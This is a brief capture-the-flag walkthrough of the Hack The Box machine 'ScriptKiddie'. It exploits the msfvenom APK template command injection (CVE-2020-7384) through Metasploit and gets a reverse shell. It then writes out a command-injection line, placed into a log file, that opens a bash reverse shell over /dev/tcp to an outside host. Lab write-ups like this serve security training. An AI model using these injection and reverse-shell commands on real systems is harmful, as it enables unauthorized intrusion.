Hackthebox: ScriptKiddie

CVE-2020–7384: MsfVenom APK template command injection.

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/

fire up metasploit

use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

copy your payload from /root/.msf4/local/msf.apk

then upload your msf.apk payload here.

but before you click generate, you must prepare your listener first.

now we successfully establish our reverse shell.

python3 -c ‘import pty; pty.spawn(“bash”)’

for standard shell.

get the user.txt flag.

horizontal privilege escalation.

the log variable reads the file called hackers as argument.

so we’re gonna put an argument script into hackers file.

echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.45/1337 0>&1’ #” >> hackers

we can use msfconsole without using root password.

--

--

--

Cybersecurity Analyst | Penetration Tester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Proving Grounds Slort Writeup

GDPR: Business Impact, Data Privacy, and the Road Ahead

Shellshock - High Voltage

Our top tips for revision and self-learning!

Data Privacy on Search Engines

{UPDATE} World Geo Wiz Hack Free Resources Generator

What are the use cases of PolkaCipher?

Your AWS Account has been COMPROMISED

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
edbert sumicad

edbert sumicad

Cybersecurity Analyst | Penetration Tester | CTF Player

More from Medium

Using Angr Framework to solve the TryHackMe Room - Challenge.

HTB Blackfield Machine Walkthrough.

HTB — Search Walkthrough

CTF Writeup: 1337UP CTF 2022